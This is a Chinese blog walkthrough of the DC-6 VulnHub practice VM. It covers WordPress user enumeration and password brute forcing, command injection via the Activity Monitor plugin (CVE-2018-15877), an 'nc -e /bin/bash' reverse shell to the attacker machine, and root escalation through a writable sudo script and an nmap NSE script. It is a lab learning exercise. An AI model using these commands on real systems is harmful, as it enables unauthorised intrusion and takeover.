DC系列:6 (DC-6靶机渗透测试详细步骤)

最新推荐文章于 2024-04-25 09:18:55 发布
最新推荐文章于 2024-04-25 09:18:55 发布
阅读量3.2k 收藏 4
点赞数
分类专栏: kali 漏洞复现 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45671944/article/details/121796646
版权

DC-6靶机渗透

环境搭建

详情

名称DC- 6
发布日期2019年2月28日
作者DCAU
系列DC
网页https://www.vulnhub.com/entry/dc-6,315/

描述

DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,所以应该非常适合初学者。

此挑战的最终目标是获得 root 权限并读取唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

对于初学者,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文以获得帮助,让你重新开始。
但请注意:我不会给你答案,而是给你一个关于如何前进的想法。

使用工具

靶机:DC-6 192.168.10.164
hacker:kali 192.168.10.153

一:信息收集

0x01查看存活主机

 arp-scan -l

在这里插入图片描述

0x02查看主机开放的端口

masscan --rate=100000 --ports 0-65535 192.168.10.164

在这里插入图片描述

0x03查看端口开放的服务

nmap -sV -T4 -O -p 80,22 192.168.10.164

在这里插入图片描述

0x04查看主机指纹信息

whatweb http://192.168.10.164

在这里插入图片描述

0x05访问靶机HTTP服务

发现浏览器找不到此网站(dns无法解析此ip)
在这里插入图片描述
添加“192.168.10.164 wordy”到host文件中(“C:\Windows\System32\drivers\etc\hosts”)

在这里插入图片描述
发现可以进行正常访问,此时发现有word press建站后台登录口
在这里插入图片描述

二:漏洞发现

0x01 用户名枚举

wpscan --url http://wordy/ -e u
在这里插入图片描述

0x02 暴力破解用户名口令

wpscan --url http://wordy/ -U username.txt -P /usr/share/wordlists/rockyou.txt

在这里插入图片描述
发现activity monitor插件
在这里插入图片描述

0x03 漏洞信息查询

尝试搜索此插件的漏洞信息
在这里插入图片描述
查找到一个漏洞,查看使用手册
在这里插入图片描述

01 背景介绍 WordPress 插件Plainview Activity Monitor存在一个远程命令执行漏洞。Plainview Activity Monitor 是一款网站用户活动监控插件。远程攻击者可以通过构造的url来诱导wordpress管理员来点击恶意链接最终导致远程命令执行。
02 影响范围
Plainview Activity Monitor plugin version <= 20161228
03 利用方式 默认后台
wp-login.php Activity Monitor >tools 用命令执行
04 漏洞序号
CVE-2018-15877

CVE-2018-15877漏洞

在这里插入图片描述

三:漏洞利用

0x01 命令执行漏洞

尝试拼接命令,ping 192.168.10.153|ls

在这里插入图片描述

发现可以执行,抓包进行命令执行
ping 192.168.10.153| nc -e /bin/bash 192.168.10.153 1234

在hacker上监听1234端口

在这里插入图片描述

0x02getshell成功

反弹shell成功
在这里插入图片描述

0x03开启终端

python -c ‘import pty;pty.spawn("/bin/bash")’ 开启一个python终端

四:提权

0x01查看用户信息

cd 到/home/mark目录下查看文件things-to-do 文档,查看
在这里插入图片描述
翻译一下。。。提示到有用户 graham的口令,尝试su graham切换用户
在这里插入图片描述
查看jens用户下文件信息,发现对backups.sh文件具有可执行权限,且以jens用户执行。尝试写入反弹终端命令并执行

在这里插入图片描述

0x02转换身份

echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh 尝试以jens身份执行此文件,发现切换成功
在这里插入图片描述

0x03 找到提权点

在这里插入图片描述
sudo -l 查看用户当前可执行的sudo命令,发现nmap命令执行时以root身份执行,尝试编写提权脚本

echo ‘os.execute("/bin/bash")’ > get_root.nse
nse为nmap可执行文件后缀,此命令为开启一个终端(以当前身份)
在这里插入图片描述
nmap --script=/home/jens/get_root.nse 执行此脚本
提权成功
在这里插入图片描述

0x04flag获取

cd 到root下拿到flag文件,渗透结束(可以留后门——)
在这里插入图片描述

总结

这次渗透测试,考察了hacker对于暴力破解的理解掌握,对于命令执行攻击漏洞以及对于反弹shell的理解和对于提权方式的掌握。

jrdh1209
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记录DCOS中SSL证书的配置和调试过程
我希望,快乐,在我走过的地方绽放。。。。
11-03 385
mesosphere已经基本搭建完成,安装了marathon-lb做请求分发,最后需要将所有的请求转为https处理。由于不准备做全局的证书,所以只能针对每个应用单独进行证书配置。 起初没在意marathon-lb,认为他只是简单的请求分发,SSL跟他无关,就在 应用的nginx中配置了80和443两种访问方式,注意有个误打误撞的操作:在完整配置SSL的情况下,比如listen 443...
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 934
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC-6通关教程
最新发布
m0_74402888的博客
04-25 894
原理:nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,默认用root 权限执行,所以反弹的 shell 也是 root。发现了jens用户的无密码命令执行文件backup.sh,也就是以jens的身份横向命令执行,接着我们来看一下该文件。根据在DC-6官网的提示,使用kali自带的巨大字典rockyou.txt中含有k01的密码作为爆破的字典。sudo -l 命令用于列出当前用户可通过 sudo(SuperUser DO)命令执行的所有命令的权限。
DC靶机系列DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC-6靶机渗透测试详细教程
jennycisp的博客
12-14 1257
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到admin登录地址发现命令注入漏洞使用burp抓包修改数据反弹shell打开交互模式 python -c ‘import pty;进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命令脚本转换到jens用户发现可执行root的文件为nmap创建一个nmap文件执行脚本只想nmap文件执行脚本获取到root。
DC-6靶机渗透详细流程
braty_的博客
01-28 489
wpscan --url http://wordy -U users.list -P /usr/share/wordlists/rockyou.txt //kali自带的字典。接着我们向里面追加写入一个shell的命令,发现现在的用户权限不够,待会再说。提权后是盲敲,光标没变化,,算了,编辑好在粘贴去找flag。发现访问不了,,记起来有重定向,要添加 hosts。哦吼,意外之喜,,发现了5个用户名。先看看 SUID:没啥有用的信息。文件,那我们直接先 su 过去。看回显,,果然存在。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1910
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 785
DC-6靶机详细渗透过程
DC-4靶机渗透测试
weixin_52003758的博客
03-21 341
DC-4靶机渗透测试
Vulnhub-DC-6靶机实战(Nmap提权)
御七彩虹猫
05-19 1526
Vulnhub-DC-6靶机实战(Nmap提权)
DC-6 渗透测试
Darklord.W
04-14 1853
DC-6渗透测试 0x00实验环境 靶机DC-6,IP地址:192.168.8.141 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web端 考虑需要添加hosts记录 正常访问 Wpscan扫描站点 wpscan --url...
Dc-6靶机实验
weixin_52263461的博客
03-17 402
靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 虚拟机软件 DC-6靶机IP地址:192.168.62.136 Kali的IP地址:192.168.62.135 使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136 使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http) 浏览器地址栏输入靶机IP地址,发现显示域名但无法
DC-3靶机渗透测试详细教程
啊醒的博客
05-04 2011
DC-3靶机渗透测试详细教程
DC-6 步骤
底层社会中的弱智
09-21 338
目标IP 192.168.43.55 使用wpscan进行扫描 扫描的目标为用户和危险插件 过期插件 用户名 先对用户名进行爆破 来自作者的提醒 登陆 搜索已知的漏洞利用 下载利用 本地使用nc接收 提权 可以不使用密码执行backup.sh 可以直接获得jens的bash权限 在提权 nmap提权 TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF su
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值